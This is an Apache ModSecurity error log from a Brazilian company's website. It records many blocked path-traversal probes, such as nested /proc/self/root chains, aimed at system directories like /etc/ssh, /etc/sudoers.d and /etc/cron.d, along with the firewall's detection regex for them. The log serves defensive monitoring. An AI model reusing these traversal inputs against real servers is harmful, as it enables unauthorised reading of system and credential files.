[Fri Mar 20 05:29:03.826364 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:37804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FT_XLqtnMIWvjpaJ8MQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:03.829153 2026] [:error] [pid 11167:tid 140411548894976] [client 216.73.216.191:18973] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FT_HIg5MgXLBnicPbhAAAAdc"]
[Fri Mar 20 05:29:05.745243 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:37806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FUda6ubjKNq_cu4azWQAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:07.018381 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:37822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FUwF0L0L-SsrnPo5J9AAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:09.448327 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.241.31:39992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FVfXLqtnMIWvjpaJ8NgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:10.586946 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.45:50380] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FVta6ubjKNq_cu4azYwAAA0Q"]
[Fri Mar 20 05:29:10.756886 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:40008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FVhCii7xarUs8iHZI8gAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:12.099437 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:40014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FWPHIg5MgXLBnicPbjwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:14.108756 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:40026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FWda6ubjKNq_cu4azaAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:18.603867 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.113:50846] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FXvqxLDW4GITHUkTExQAAARY"]
[Fri Mar 20 05:29:29.030828 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.88:51474] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0Fabninkcc-iUj5ApApQAAA4A"]
[Fri Mar 20 05:29:30.969654 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:40030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FajJ3M9BSuKP7CAb1IgAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:32.248984 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.241.31:47456] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FbPHIg5MgXLBnicPbqAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:34.796602 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:47464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FbQF0L0L-SsrnPo5KCQAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:38.247056 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:47470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FcuoXxyEfFpUF8f9jxAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:40.509556 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:50334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fc7ninkcc-iUj5ApArQAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:41.867362 2026] [:error] [pid 11642:tid 140411674785536] [client 74.7.241.31:50350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fdbninkcc-iUj5ApAtgAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:42.523797 2026] [:error] [pid 7893:tid 140411548894976] [client 57.141.18.27:51916] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0FdhCii7xarUs8iHZJDwAAAhc"]
[Fri Mar 20 05:29:42.872712 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:40796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FdvHIg5MgXLBnicPbswAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Fri Mar 20 05:29:43.038228 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:50358] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FdwF0L0L-SsrnPo5KDAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:44.299048 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:50362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FeOoXxyEfFpUF8f9jxwAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:47.701073 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:50378] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Fe_qxLDW4GITHUkTE3AAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:51.219813 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:43544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FfxCii7xarUs8iHZJIAAAAhM"], referer: 